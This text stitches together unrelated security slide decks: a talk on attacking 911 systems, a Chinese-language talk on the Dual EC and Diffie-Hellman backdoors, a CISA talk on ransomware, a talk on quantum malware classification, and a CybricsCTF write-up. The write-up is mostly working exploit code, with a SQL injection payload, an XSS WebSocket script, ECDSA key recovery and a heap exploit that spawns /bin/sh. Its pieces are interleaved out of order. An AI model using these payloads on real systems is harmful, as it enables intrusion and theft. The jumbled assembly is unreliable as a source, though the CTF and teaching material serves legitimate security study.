Voice + pANI/ESRK pANI / ESRK ALI Cell Tower Voice Callback # (CBN) Cell Tower Location Cell Tower Sector pANI / ESRK CBN, Cell Tower Location, Cell Tower Sector, pANI / ESRK Mobile Positioning Center Wireless Phase 1 Data Wireless Phase 2 Telephone Call Mobile Switching Center Selective Router PSAP ALI Database Voice Only Voice and Data Data Voice + pANI/ESRK Voice + pANI/ESRK pANI / ESRK ALI Cell Tower Voice Callback # Cell Tower Location Cell Tower Sector pANI / ESRK Latitude and Longitude, Callback #, Cell Tower Location, Cell Tower Sector, pANI / ESRK Position Determination Equipment Mobile Positioning Center Voice Wireless Phase 2 Data VoIP Call Emergency Services Gateway Selective Router PSAP ALI Database Voice Only Voice and Data Data VoIP + CBN Voice + ESQK Voice + ESQK ESQK ALI VoIP Service Provider CBN ESN#, ESQK CBN, Location, ESQK VoIP + CBN VSP Database The Three Goals of Hacking 911 • Initiate inappropriate 911 response • Interfere with an appropriate 911 response • 911 system surveillance Wired – End Office Control End Office Selective Router PSAP ALI Database Voice Only Voice and Data Data Voice Voice + !%$# Voice + !%$# !%$# ALI?? ALI Database NSI Emergency Calls Mobile Switching Center Selective Router PSAP ALI Database Voice Only Voice and Data Data Voice + pANI/ESRK Voice + pANI/ESRK pANI / ESRK ALI Cell Tower CBN? Cell Tower Location Cell Tower Sector pANI / ESRK CBN, Cell Tower Location, Cell Tower Sector, pANI / ESRK CBN = 911 + last 7 of ESN/IMEI Voice Voice Mobile Positioning Center Wireless Location Modification Mobile Switching Center Selective Router PSAP ALI Database Voice Only Voice and Data Data Voice Voice + pANI/ESRK Voice + pANI/ESRK pANI / ESRK ALI Cell Tower Callback # Cell Tower Location Cell Tower Sector pANI / ESRK !@#Lat/Long%%$, Callback #, Cell Tower Location, Cell Tower Sector, pANI / ESRK Position Determination Equipment Mobile Positioning Center Voice VSP Modification Emergency Services Gateway Selective Router PSAP ALI Database Voice Only Voice and Data Data VoIP + CBN Voice + ESQK Voice + ESQK ESQK #ALI@ VoIP Service Provider CBN ESN#, ESQK VSP Database CBN, #%Location$@, ESQK VoIP + CBN Swatting Call VoIP Service Providers Service disruption attacks • Line-cutting • Cell phone jamming • ALI database editing • TDoS • PSAP targeting Resource exhaustion (virtual/personnel) Outdated system architectures Lack of air-gapping Privacy Health Impacts Bystander CCO CPR Improves Chance of Survival from Cardiac Arrest 100% 80% 60% 40% 20% 0% Time between collapse and defibrillation (min) 0 1 2 3 4 5 6 7 8 9 Survival (%) Nagao, K Current Opinions in Critical Care 2009 EMS Arrival Time based on TFD 90% Code 3 Response in FY2008. Standards of Response Coverage 2008. EMS Arrival No CPR Traditional CPR CCO CPR Strategic Threat Agents • 6000 PSAPs taking a combined 660,000 calls per day • Fundamental building block of our collective security • Potential damage extends beyond individual people not being able to talk to 911 Reverse 911 Solutions • Call-routing red flags • Call “captchas” • PSAP security standardizations • Increased budgets for security services • Open the Black Box Q&A
那些年年的密碼學後⾨門 講者 : OAlienO ⽬目錄 1. Cryptographic Backdoor ✦ 重要性 ✦ 種類 2. Dual EC Backdoor ✦ 介紹 ✦ 隨機數很重要嗎? ✦ 後⾨門原理理 ✦ 故事時間 3. Diffie Hellman Backdoor ✦ 複習時間 ✦ Everybody Backdoor ✦ Nobody-But-Us Backdoor 4. Conclusion Cryptographic Backdoor Cryptographic Backdoor - 重要性 網路路通訊⼗十分依賴密碼系統 各國都想要 監聽網路路通訊 密碼學後⾨門 Cryptographic Backdoor - 種類 Everybody Backdoors : 所有⼈人都可以進來來的後⾨門,與其說後⾨門,不如說是故意設置的漏洞洞 Nobody-But-Us ( NOBUS ) Backdoors 只有擁有⾦金金鑰的⼈人才能⽤用的後⾨門,真正的後⾨門 Dual EC Backdoor Dual EC - 介紹 Dual EC 是⼀一個偽隨機數產⽣生器 ( pseudorandom number generator ) 剛公布 Dual EC 的時候他就有許多問題 1. 比其他的 PRNG 慢 2. 產⽣生的隨機數沒有那麼隨機 ( biased ) 3. 可能有後⾨門存在這個 PRNG Dual EC - 隨機數很重要嗎 ? 1. DSA - private key 2. AES - iv, key 3. RSA - p, q 4. … 許多的密碼系統都需要隨機數 當我們能預測這些隨機數,差不多就等同於我們可以破解他 Dual EC - 後⾨門原理理 https://projectbullrun.org/dual-ec/documents/dual-ec-20150731.pdf Dual EC 有兩兩個版本 : Dual EC 2006 Dual EC 2007 Dual EC - 後⾨門原理理 https://projectbullrun.org/dual-ec/documents/dual-ec-20150731.pdf Dual EC 2006 Dual EC - 後⾨門原理理 https://projectbullrun.org/dual-ec/documents/dual-ec-20150731.pdf 256 bits 整數 P, Q 是在 Elliptic Curve 上的點 丟掉 16 bits 輸出 不可逆函式 Dual EC - 後⾨門原理理 https://projectbullrun.org/dual-ec/documents/dual-ec-20150731.pdf 橢圓曲線 ( Elliptic Curve ) ? 就是滿⾜足下⾯面⽅方程式的⼀一堆點 在密碼學我們是⽤用這個 有了了⼀一堆點形成的集合 再定義⼀一個加法運算 我們就得到了了⼀一個群 Dual EC - 後⾨門原理理 https://projectbullrun.org/dual-ec/documents/dual-ec-20150731.pdf 兩兩個在 Elliptic Curve 上的點怎麼加法 ? 切線交點對 x 軸鏡射 A B + = C Dual EC - 後⾨門原理理 https://projectbullrun.org/dual-ec/documents/dual-ec-20150731.pdf 我們的不可逆函式就是⼀一個 ECDLP ( Elliptic Curve Discrete Logarithm Problem ) 這是個非常難的問題,所以可以把他當作不可逆函式 就是 這個點的 x 座標 Dual EC - 後⾨門原理理 https://projectbullrun.org/dual-ec/documents/dual-ec-20150731.pdf 有了了不可逆函式 我們沒辦法從輸出 r 反推內部狀狀態 s 也就沒辦法從內部狀狀態 s 往下預測接下來來的輸出 Dual EC - 後⾨門原理理 https://projectbullrun.org/dual-ec/documents/dual-ec-20150731.pdf It sounds perfect What could possibly go wrong ? Dual EC - 後⾨門原理理 https://projectbullrun.org/dual-ec/documents/dual-ec-20150731.pdf 如果攻擊者知道 使得 那丟掉的 16 bits 怎麼辦 ? 直接暴暴⼒力力嘗試 Dual EC - 後⾨門原理理 https://projectbullrun.org/dual-ec/documents/dual-ec-20150731.pdf 知道 得天下 Dual EC - 後⾨門原理理 https://projectbullrun.org/dual-ec/documents/dual-ec-20150731.pdf 他其實還有⼀一個功能 可以在輸出完將⽬目前的內部狀狀態 xor ⼀一個 additional input 但是這個功能會損壞後⾨門,讓後⾨門不好⽤用 使⽤用者可以選擇要不要⽤用 Dual EC - 後⾨門原理理 https://projectbullrun.org/dual-ec/documents/dual-ec-20150731.pdf 我們沒辦法從 求出 無法還原內部結構 s2 還原內部結構 s3 要求的輸出超過兩兩個區塊 不受影響 Dual EC - 後⾨門原理理 https://projectbullrun.org/dual-ec/documents/dual-ec-20150731.pdf Dual EC 2007 Dual EC - 後⾨門原理理 https://projectbullrun.org/dual-ec/documents/dual-ec-20150731.pdf Dual EC 2007 修好了了後⾨門 我們同樣可以從 s1P 推出 s2 以及接下來來的狀狀態 但是還是需要猜 additional input Dual EC - 後⾨門原理理 https://projectbullrun.org/dual-ec/documents/dual-ec-20150731.pdf 所以真的有後⾨門嗎 ? 求 d 是個 ECDLP 我們知道可能有後⾨門但不能證明有 直到 Edward Snowden 洩漏出 NSA 的⽂文件 XD NIST SP 800-90 裡⾯面完全沒提到 P, Q 從哪裡來來的 Dual EC - 故事時間 https://csrc.nist.gov/csrc/media/projects/crypto-standards-development-process/documents/dualec_in_x982_and_sp800-90.pdf Dual EC - 故事時間 https://eprint.iacr.org/2006/190.pdf 2006 / 05 / 29 論⽂文提出 Dual EC 的輸出沒有很隨機 Dual EC - 故事時間 http://rump2007.cr.yp.to/15-shumow.pdf 2007 / 08 Crypto 2007 rump session Microsoft ⼈人員提出 Dual EC 可能有後⾨門 Dual EC - 故事時間 https://www.wired.com/2007/11/securitymatters-1115/ 2007 / 11 / 15 ⼀一篇部落落格談論 Dual EC 是不是真的有後⾨門 Dual EC - 故事時間 https://csrc.nist.gov/projects/cryptographic-algorithm-validation-program/validation/validation-list/drbg 2008 / 07 / 03 RSA BSAFE 採⽤用 Dual EC Dual EC - 故事時間 https://csrc.nist.gov/projects/cryptographic-algorithm-validation-program/validation/validation-list/drbg 2009 / 09 / 30 Windows 7 採⽤用 Dual EC Dual EC - 故事時間 https://en.wikipedia.org/wiki/File:Classification_guide_for_Project_BULLRUN.pdf 2013 Snowden leaks - Project BULLRUN 驗證後⾨門真的存在 Dual EC - 故事時間 https://www.theverge.com/2013/12/20/5231006/nsa-paid-10-million-for-a-back-door-into-rsa-encryption-according-to 2013 / 12 / 20 NSA 給 RSA ⼀一千萬美⾦金金 將 Dual EC 設為 BSAFE 的 預設 隨機產⽣生器 Dual EC - 故事時間 https://www.cbronline.com/news/iso-nsa 2018 / 04 / 27 ISO 拒絕 將 NSA 設計的 Simon & Speck 列列為標準 Diffie Hellman Backdoor Diffie Hellman Backdoor - 複習 群 ( Group ) 簡⽽而⾔言之 : 群就是 ⼀一個集合 + ⼀一個運算元 滿⾜足 ⼀一些條件 Diffie Hellman Backdoor - 複習 Order Diffie Hellman Backdoor - 複習 Smooth Number Diffie Hellman Backdoor - 複習 什什麼是 Diffie Hellman ? Diffie Hellman Backdoor - 複習 Discrete Logarithm Problem ( DLP ) Diffie Hellman Backdoor - 複習 Pollard’s Rho Algorithm ⽤用來來解 Discrete Logarithm Problem Diffie Hellman Backdoor - 複習 Pohlig Hellman Algorithm ⽤用來來解 Discrete Logarithm Problem 使⽤用條件 : 當 p - 1 是 smooth number Diffie Hellman Backdoor - Everybody https://eprint.iacr.org/2016/644.pdf Everybody Backdoors : 1. p - 1 選 B-smooth 的數,讓我們可以⽤用 Pohlig-Hellman 解 DLP 2. 選⼀一個 order 很⼩小的 element 當 g,讓我們可以⽤用 Pollard’s Rho 解 DLP Diffie Hellman Backdoor - NOBUS https://eprint.iacr.org/2016/644.pdf NOBUS Backdoors : Diffie Hellman Backdoor - NOBUS https://eprint.iacr.org/2016/644.pdf 問題來來了了 : 當 (p - 1) 和 (q - 1) 都是 B-smooth 的話 可以直接⽤用 Pollard’s p - 1 Algorithm 分解 n 這樣所有⼈人都可以⽤用我們的後⾨門 ( NOT GOOD ) Diffie Hellman Backdoor - NOBUS https://eprint.iacr.org/2016/644.pdf 引入 pbig 和 qbig 兩兩個相對較⼤大的質數 ⽤用來來抵擋 Pollard’s p - 1 Algorithm Diffie Hellman Backdoor - NOBUS https://eprint.iacr.org/2016/644.pdf 不像⼀一般的惡惡意程式後⾨門 使⽤用這個後⾨門時,我們只需要把 常數 換掉 完全看不出來來我們在裝後⾨門 XD Diffie Hellman Backdoor - 防禦 https://eprint.iacr.org/2016/644.pdf 針對這個後⾨門的防禦很簡單 就是確保參參數 p 真的是⼀一個質數 如果允許 p 是合數的話 還是很難分辨後⾨門和不是後⾨門 Conclusion Conclusion 這次介紹了了兩兩個密碼學後⾨門 Dual EC Backdoor 和 Diffie Hellman Backdoor 可以看出密碼學後⾨門的防護相較⼀一般的後⾨門困難 1. 沒有 general 的防護⽅方式 2. 需要單獨作分析來來防禦 3. 有些甚⾄至無法證明有沒有被塞後⾨門 4. 使⽤用其他⼈人設計的密碼系統就會有風險 THANKS
Asia-Pacific Cybersecurity Community Collaboration and Joint Defense Tom Millar, US Cybersecurity and Infrastructure Security Agency (CISA) 1. A Little Bit About CISA 2. The Top Threat to US Critical Infrastructure 3. Fighting The Top Threat 4. Working Collaboratively 5. Questions & Answers What is CISA? • CISA is the “Nation’s Risk Advisor” • Not a Cyber Regulator • Not a Law Enforcement Agency • Our stakeholders include US Federal Government agencies and US Critical Infrastructure The #1 Threat To Critical Infrastructure … is Ransomware. • Ransomware is intentionally disruptive. • Recovery to full operations can take weeks (whether the victim pays the ransom or not). • Recent severe incidents have affected the energy sector, food and agriculture supply chain, and hospital networks. • Attacks occur daily across all sectors. Defeating Ransomware Together CISA works together with its sister agencies and with private sector partners to combat the ransomware threat. • Law Enforcement Agencies and the Treasury Department disrupt operations and their payment schemes. • Defense, Law Enforcement, Diplomatic and Intelligence Agencies work to take the fight to the enemy. • CISA leads the effort to harden targets – making systems more secure and resilient. Global Collaboration Critical infrastructure is global and international collaboration is key to succeeding against this threat. • International partnerships have helped alert potential victims and minimizing impact. • Sharing timely alerts and detection methods is critical. • This is done via various trust communities using different channels, from formal Information Sharing and Analysis Centers (ISACs) to volunteer groups. Thank You!
CybricsCTF WriteUp By Nu1L Author : Nu1L CybricsCTF WriteUp By Nu1L CTB Little Buggy Editor rm -rf’er GrOSs 1 Reverse Walker Kernel Reverse Paired Listing Network LX-100 ASCII Terminal WEB Multichat Ad Network Announcement Cyber Signer scanner GrOSs 2 Forensic Recording Namecheck rebyC CAPTCHA The Flag CTB Little Buggy Editor curses vim flag /etc/flag.txt buffer 500 * 500 _maxy _maxx _maxy _maxx terminator GlobalBuffer, FileName /etc/flag.txt rm -rf’er GrOSs 1 flag Reverse Walker flag.txtstartread dulrcf cCHECKPOINT + 1 fCHECKPOINT4 xyCHECKPOINT dump10x10cxy keykey01 size5ckey checkpoint dfs buildbox:/# echo 'set line=($<)' > test.sh buildbox:/# echo 'while($#line > 0)' >> test.sh buildbox:/# echo 'echo $line' >> test.sh buildbox:/# echo 'set line= ( $< )' >> test.sh buildbox:/# echo end >> test.sh buildbox:/# source test.sh < /etc/ctf/flag.txt cybrics{cREUaGdddrcBtdtpruurrrrddddllcFGRiQllddrrrrrddlllcikhAcf} Kernel Reverse ioctl0x5702xor 0x13373389Flag Paired 2EXEdlldbexecheck flag exeexedlldllkey value db cREUaG //checkpoint 1 dddr cBtdtp //checkpoint 2 ruurrrrddddll cFGRiQ //checkpoint 3 llddrrrrrddlll cikhAcf // checkpoint 4 #include <stdio.h> #include <string.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <time.h> int main() { int fd = open("/dev/ioctl", O_RDWR); unsigned char * flag[512]; *(unsigned int *)flag = time(0) ^ 0x13373389u; ioctl(fd, 0x5702, &flag); puts(flag); } app13checkcheckdbdummy_string stage 2. checkenablestage 3. Fcheckdbshellcodecheck this_is_just_some_random_string!check stage 3app2checkapp2app10x400 app1app2dllapp2 shellcodeapp1app1app2shellcode shellcodeflag0x81'rbyc' storage(7) = 0x767c unk_4D70000[8] = dword ptr flag[0] storage(7) += dword ptr unk_4D70000[8] storage(7) = storage(7) == 0x909b110c tot += 1 storage(7) = 0xe20b unk_4D70000[8] = dword ptr flag[1] storage(7) += dword ptr unk_4D70000[8] storage(7) = storage(7) == 0x9a917ca5 tot += 1 storage(7) = 0xc323 unk_4D70000[8] = dword ptr flag[2] storage(7) += dword ptr unk_4D70000[8] storage(7) = storage(7) == 0x809b53bd tot += 1 storage(7) = 0xdaba unk_4D70000[8] = dword ptr flag[3] storage(7) += dword ptr unk_4D70000[8] storage(7) = storage(7) == 0x8b81754a tot += 1 .... x=[0x90,0x9a, 0x9a, 0x90, 0x9a,0x80,0x8b,0x99,0x80,0x8b,0xb8,0x90,0x96,0x87,0xa7,0x91,0xc0,0x80,0x8c,0xd3,0x9c,0x 8d,0xa7,0x8f,0xb3,0x84,0xc9,0x81,0xd2,0xd2,0xd9,0x9f] for i in range(len(x)): print(chr(x[i]^0x81^ord('rbyc'[i%4])),end='') cybrics{sh@red_s3ct1on_m@g1c!1!} Listing + 16flag Network LX-100 udpjpegmagic numberdump ASCII Terminal >>> a = [0xd3, 0xd1, 0x23, 0x76, 0x61, 0x35, 0xab, 0x9a, 0xd5, 0xd5, 0x27, 0x23, 0x35, 0x65, 0xf8, 0x83, 0xd3, 0xc9, 0x27, 0x61, 0x6c, 0x33, 0xb9, 0x85, 0xd6, 0xd5, 0x71, 0x22, 0x31, 0x61, 0xf8, 0xcb] >>> key = [0xb0, 0xb0, 0x45, 0x13, 0x05, 0x50, 0xca, 0xfe] >>> flag = '' >>> for i in range(32): ... flag += chr(a[i] ^ key[i % 8]) ... >>> flag 'cafedeadeeb0052}cybrics{fe414125' from PIL import Image, ImageDraw, ImageFont from pwn import * context.log_level = 'debug' def gen_payload(payload): shape = (15+20*len(payload), 30) payload_img = Image.new('L', shape, 'white') font = ImageFont.truetype("../pt-mono.bold.ttf", 20) img_draw = ImageDraw.Draw(payload_img) img_draw.text((15, 1), payload, fill='black', font=font) payload_ascii = '' for idx, pixel in enumerate(payload_img.getdata()): if idx % shape[0] == 0: payload_ascii += '\n' if pixel: payload_ascii += '.' else: payload_ascii += '#' WEB Multichat Ad Network return payload_ascii[1:] + '\n' print(gen_payload('cat flag.txt')) <script> const logger = (a) => { fetch(`/?q=${encodeURI(a)}`); }; (() => { let conn = new WebSocket("ws://multichat-cybrics2021.ctf.su/ws"); conn.onclose = (e) => { if (e.code === 1003) { logger(e.reason); } logger("closed"); }; conn.onopen = (e) => { logger("opened"); conn.send("Hey, i forgot the flag. Can you remind me?"); }; conn.onmessage = (e) => { logger(e.data); }; })(); </script> Announcement Cyber Signer import requests url="http://adnetwork-cybrics2021.ctf.su/adnetwork" session = requests.Session() session.max_redirects = 1337 text=session.get(url) print(text.content) import hashlib import requests url="http://announcement-cybrics2021.ctf.su" def md5(s): return hashlib.md5(s).hexdigest() def send(s): txt = requests.post(url, data={"digest": md5(s),"email":s}) print(txt.content) if __name__=="__main__": #select group_concat(table_name) from information_schema.tables where table_schema='announcement' #select group_concat(column_name) from information_schema.columns where table_name='logs' send("' or updatexml(1,concat(0x7e,(select group_concat(log) from logs)),0) or'") from ecdsa import ecdsa as ec from datetime import datetime from Crypto.Util.number import * import hashlib g = ec.generator_192 N = g.order() print(N) ''' C:\Users\Administrator>nc 10105 What you want to do? 1) Make signature of data 2) Get flag >1 4736040515387461309866734896535655436667638303477697365380, 5494781332577808392840288969057349930890554021041285868060, 210217282489038996911518232472507371436 C:\Users\Administrator>nc 10105 What you want to do? 1) Make signature of data 2) Get flag >1 4736040515387461309866734896535655436667638303477697365380, 4619538881461989508363411793794136518737799143393739580740, 71445113775411488274569459774778090752 C:\Users\Administrator>nc 10105 What you want to do? 1) Make signature of data 2) Get flag >1 4736040515387461309866734896535655436667638303477697365380, 3947105585447877525671309913148623362329628718965438318646, 90573011839418278106056861121907516635 ''' r,s1,m1 = 4736040515387461309866734896535655436667638303477697365380, 5494781332577808392840288969057349930890554021041285868060, 210217282489038996911518232472507371436 r,s2,m2 = 4736040515387461309866734896535655436667638303477697365380, 4619538881461989508363411793794136518737799143393739580740, 71445113775411488274569459774778090752 r,s3,m3 = 4736040515387461309866734896535655436667638303477697365380, 3947105585447877525671309913148623362329628718965438318646, 90573011839418278106056861121907516635 secret = (m1*s2-m2*s1)*inverse(r*s1-r*s2,N)%N #m1s2+drs2=ks1s2=m2s1+drs1 #k = (m3+d*r)*inverse(s3,N)%N #print(d,k) PUBKEY = ec.Public_key(g, g * secret) PRIVKEY = ec.Private_key(PUBKEY, secret) hash = int(hashlib.md5(b'12:30:05:get_flag').hexdigest(), 16) nonce = 5 signature = PRIVKEY.sign(hash, nonce) print(f"{signature.r}, {signature.s}, {hash}\n".encode()) ''' scanner flaggif GrOSs 2 C:\Users\Administrator>nc 10105 What you want to do? 1) Make signature of data 2) Get flag >2 Get signature for md5("12:30:05:get_flag") 410283251116784874018993562136566870110676706936762660240, 3022917093929959706671975063129227627813437174541219195283 Get your flagcybrics{7e296c5b91a49cfd9c54544238cb3c29fc0ef237} ''' from PIL import Image res = Image.new('L', (1080, 2080)) for i in range(7, 89): # 89 im = Image.open(f' {i}.png') im1 = im.crop((0, 500, 1080, 515)) res.paste(im1, (0, (i-7)*15, 1080, (i-6)*15)) res.save('tmp.png') from pwn import * # p = process('./main') p = remote('', 11710) # libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so') libc = ELF('./libc-2.27.so') # md5 -> b7bb0c7852f533334ee662034f534f7e context.log_level = 'debug' def fuck_io(s): # while p.recvuntil('shell(0)',timeout=0.2) != b'': # p.sendline('') p.sendlineafter('storage(2)<',s) def launch_gdb(): context.terminal = ['gnome-terminal', '--'] # gdb.attach(proc.pidof(p)) print("gnome-terminal -- gdb attach " + str(proc.pidof(p)[0])) os.system("gnome-terminal -- gdb -q ./main " + str(proc.pidof(p)[0])) def fuck_io2(s): p.recvuntil('storage(2)>') p.sendafter('storage(2)<',s) def add(i,size): fuck_io('1') fuck_io(str(i)) fuck_io(str(size)) def dele(i): fuck_io('2') fuck_io(str(i)) def edit(i,c): fuck_io('3') fuck_io(str(i)) fuck_io(c) def show(i): fuck_io('4') fuck_io(str(i)) def shell(s): p.sendlineafter('shell(0)<',s) shell('SPAWN') shell('cat') while p.recvuntil(b'shell(0)<',timeout=0.5) != b'': p.sendline('') p.sendlineafter(b'cat','/proc/self/maps') while p.recvuntil(b'cat',timeout=0.2) == b'': p.sendline('') p.recvuntil('(1)>') leak_pie = int(p.recvuntil('-',drop=True),16) log.info('leak pie ' + hex(leak_pie)) shell('SPAWN') shell('storage') shell('EXIT') add(0,0x500) add(1,0x500) dele(0) show(0) # while p.recvuntil('storage',timeout=0.2) == b'': # p.sendline('') p.recvuntil('> ') leak_libc = u64(p.recv(8)) - 4111520 log.info('leak libc ' + hex(leak_libc)) # 0x7f553ca68be0 0x7f61c5798ca0 add(0,0x100) Forensic Recording firefoxpastebin pastebin.com/uzqCjFUa 9yDz5iZprd Namecheck ssh key vividcoala@localhostinsins rebyC CAPTCHA The Flag stegsolve 25flag add(1,0x100) add(2,0x100) dele(0) dele(1) # dele(2) # show(1) # p.recvuntil('> ') # leak_heap = u64(p.recv(8)) + 2384 # log.info('leak heap ' + hex(leak_heap)) edit(1,p64(leak_libc + libc.symbols['__free_hook'])) # raw_input() add(0,0x100) add(1,0x100) # edit(1,p64(leak_libc + libc.symbols['__free_hooks'])) edit(1,p64(leak_libc + libc.symbols['system'])) edit(0,'/bin/sh\x00') dele(0) p.interactive()
“Quantum” Classification of Malware John Seymour (seymour1@umbc.edu) 2015-08-09 whoami • Ph.D. student at the University of Maryland, Baltimore County (UMBC) • Actively studying/researching infosec for about three years (mostly academic) • Currently work for CyberPoint International Outline • D-Wave Basics • The D-Wave Controversy • How to play around on a D-Wave • Some Machine Learning Background • Building a “Quantum” Malware Classifier https://blog.kaspersky.com/quantum-computers-and-the-end-of-security/ What you might have heard (and why it’s wrong) • FALSE: The D-Wave can solve NP-Complete problems in polynomial time. • PROBABLY FALSE: The current D-Wave chip is already “better” than classical computing for hard problems. The Current State of Affairs Quantum effects are happening… …but that might not be interesting We don't know whether the D-Wave uses quantum effects for computation. Regardless, it cannot run Shor's/Grovers/QKD. http://www.dwavesys.com/ http://www.nytimes.com/ http://www.nytimes.com/ http://www.dwavesys.com/ http://www.dwavesys.com/ http://www.dwavesys.com/ D-Wave chips consist of: • magnetized niobium loops • couplers http://www.dwavesys.com/ The D-Wave QUBO 𝑖 𝑎𝑖𝑞𝑖 + 𝑖,𝑖 𝑎𝑖𝑖𝑞𝑖𝑞𝑖 "Quadratic Unconstrained Binary Optimization" Input Output They’ve got a website. To do stuff on and stuff. System 6 System 13 One D-Wave Run Input Output Blackbox/QSage • Software, developed by D-Wave • Turns arbitrary problems into QUBOs • Heuristic-based (problem is NP-Complete) • Conversation between classical machine and D-Wave • Adds time from network latency Blackbox Python Code So what can D-Wave machines do? D-Wave claims applications: classification, protein-folding models, finding close-to- optimal solutions to NPC problems (e.g. Traveling Salesman) Crash Course in Machine Learning (At least what’s relevant to this) Boosting - using combinations of weak classifiers • Consider 3 classifiers with 70% accuracy • Majority vote can increase your accuracy to 0.7838! (Hint: add up the top row) • Most boosting algorithms also allow weights for these classifiers. http://mlwave.com/kaggle-ensembling-guide/ All Correct: 0.7 * 0.7 * 0.7 = 0.3429 Two Correct: 3 * 0.7 * 0.7 * 0.3 = 0.4409 Two Wrong: 3 * 0.3 * 0.3 * 0.7 = 0.189 All Wrong: 0.3 * 0.3 * 0.3 = 0.027 Loss • Want to minimize: • Number of misclassifications • Complexity of the model N-Grams • Sliding window over text 𝐷𝐷𝐴𝐷𝐴𝐷𝐷𝐷 N-Grams • Sliding window over text 𝐷𝐷𝐴𝐷𝐴𝐷𝐷𝐷 N-Grams • Sliding window over text 𝐷𝐷𝐴𝐷𝐴𝐷𝐷𝐷 N-Grams • Sliding window over text 𝐷𝐷𝐴𝐷𝐴𝐷𝐷𝐷 N-Grams • Sliding window over text 𝐷𝐷𝐴𝐷𝐴𝐷𝐷𝐷 • Easy to generate • Used before in malware with good results • Easy to turn into weak classifiers • Complex enough to compare classifiers Building the “Quantum” Malware Classifier QBoost • Outperforms Adaboost • Robust to label noise • Will generally still learn even if training data is mislabeled • Good for learning malware: ground truth is hard! • Doesn’t scale to “Google-sized problems” • Blackbox supposedly can Dataset used • Plenty of malicious datasets to choose from • Vx Heaven, VirusShare, scraping the web • We used Vx Heaven (fairly standard but old) • No standard for benign dataset • Problematic • Windows + Cygwin + Sourceforge • Don’t do this • No adware was used in the making of this classifier (Classical) Preprocessing • Resample corpus to be balanced • Side-effects: Less time to train, lose information • Extract Features (3-gram bytes) HTTP://XKCD.COM/221/ At first, our classifier was no better than random chance Next question: how long do we need to let Blackbox run? • Previous work says 30 minute timeout • Pilot Experiment to find how long it should take • Even on small problems, it takes 10 minutes to find decent solutions • Larger problems require even more time • Limited to 32 features • We used 16 malware and 16 benign n-grams • Implemented QBoost with 10-fold cross- validation using Blackbox • Both on D-Wave and using a simulator • Compared to several models from WEKA • Adaboost • J48 Decision Tree • Random Forest Results Results Interesting Result 1: takes a LOT of time Results Interesting Result 2: Simulator > actual chip What does it mean? • Blackbox/D-Wave CAN learn a classifier • Probably a bad idea: significant overhead and must restrict problem substantially • We don’t know if this is due to Blackbox, the D- Wave chip, or some other issue • General problem-solving on D-Wave is probably a bad idea • Really should’ve stuck with QBoost • How much better is the next D-Wave chip? • Embed directly onto chip, rather than use heuristics • Better for another task? • e.g. feature preprocessing • Machine Learning Standards for Malware Analysis Thank you! Questions? seymour1@umbc.edu, @jjseymour3 References Original thesis: J. Seymour. Quantum classification of malware. Dataset prep: J. Seymour and C. Nicholas. Overgeneralization in feature set selection for classification of malware. Qboost: V. S. Denchev. Binary classification with adiabatic quantum optimization. Qloss: V. S. Denchev. Robust Classification with Adiabatic Quantum Optimization. References Tutorial on Binary Classification using D-Wave: https://web.archive.org/web/2013092715505 3/http://www.dwavesys.com/en/dev-tutorial- qbc.html. Evaluating Blackbox: C. C. McGeoch and C. Wang. Experimental evaluation of an adiabiatic quantum system for combinatorial optimization.